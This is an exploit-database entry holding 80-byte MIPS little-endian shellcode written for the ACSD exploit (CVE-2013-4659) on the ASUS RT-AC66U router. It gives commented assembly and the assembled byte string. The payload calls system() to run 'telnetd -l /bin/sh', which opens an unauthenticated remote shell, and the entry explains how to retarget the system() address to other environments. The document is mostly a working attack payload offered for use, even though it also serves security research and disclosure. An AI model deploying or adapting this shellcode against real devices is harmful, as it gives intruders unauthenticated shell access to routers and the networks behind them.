Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)

EDB-ID:

27132




Platform:

Linux_MIPS

Date:

2013-07-27


# Disassembled MIPS Little Endian Shellcode 
# Shellcode was designed for the ACSD exploit on the ASUS RT-AC66U SOHO router.
# CVE: CVE-2013-4659
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com
#
# NOTE:
# In order to use this MIPS ASM elsewhere, you will need to change the address
# of the system() function call to match your environment and reassemble the ASM.
# _ characters in the comments below represent a space.


    # Builds the NUL-terminated string "telnetd -l /bin/sh" on the stack one
    # 32-bit word at a time (little endian, so each 16-bit immediate below reads
    # as its two bytes in reverse order), points a0 at it and calls system()
    # through t9. Note for analysts: the assembled bytes at the bottom of this
    # page carry the command string as plain ASCII, so the literal text is what
    # appears in memory and on the wire.
    lui     t0,0x6e6c //Loading Upper Immediate "nl" into temp. reg. #0 (t0 = 0x6e6c0000)
    ori     t0,t0,0x6574 //Bitwise OR immediate. Putting "et" into lower 16 bits of t0; in memory this word is "teln"
    sw      t0,-20(sp) //Store first word of the command string at sp-20 (start of the string)
    
    lui     t1,0x2064 //Loading Upper Immediate "_d" into temp. reg. #1
    ori     t1,t1,0x7465 //Bitwise OR immediate. Putting "te" into lower 16 bits of t1; in memory this word is "etd_"
    sw      t1,-16(sp) //Store next part of command

    lui     t2,0x2f20 //Loading Upper Immediate "/_" into temp. reg. #2
    ori     t2,t2,0x6c2d //Bitwise OR immediate. Putting "l-" into lower 16 bits of t2; in memory this word is "-l_/"
    sw      t2,-12(sp) //Store next part of command

    lui     t3,0x2f6e //Loading Upper Immediate "/n" into temp. reg. #3
    ori     t3,t3,0x6962 //Bitwise OR immediate. Putting "ib" into lower 16 bits of t3; in memory this word is "bin/"
    sw      t3,-8(sp) //Store next part of command

    li      t4,26739 //Loading Immediate 0x6873 ("hs") into temp. reg. #4; upper 16 bits are zero, so the stored word is "sh\0\0" and NUL-terminates the string
    sw      t4,-4(sp) //Store last word of command (carries the NUL terminator)

    addi    a0,sp,-20 //a0 = address of "telnetd -l /bin/sh", the single argument to system()
    addi    sp,sp,-20 //Move stack pointer down to the string (presumably so the callee's frame does not overwrite it)

    lui     t9,0x2ab4 //Loading Upper Immediate of system() into t9 (environment-specific address, see header note)
    ori     t9,t9,0xf050 //Bitwise OR immediate. Putting rest of system() into t9 (t9 = 0x2ab4f050)
    jalr    t9 //Jump to t9/system(); the instruction below is its delay slot

    andi    at,k1,0x4132 //Filler instruction for the branch delay slot: executes with the jump, result unused


# NOTE: Assembled shellcode
#
#    #80 Bytes system() Shellcode by Jacob Holcomb of ISE
#    #Calling system() and executing telnetd -l /bin/sh
#    shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
#    shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
#    shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
#    shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
#    shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
#    shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
#    shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
#    shellcode += "\x41\x61\x33"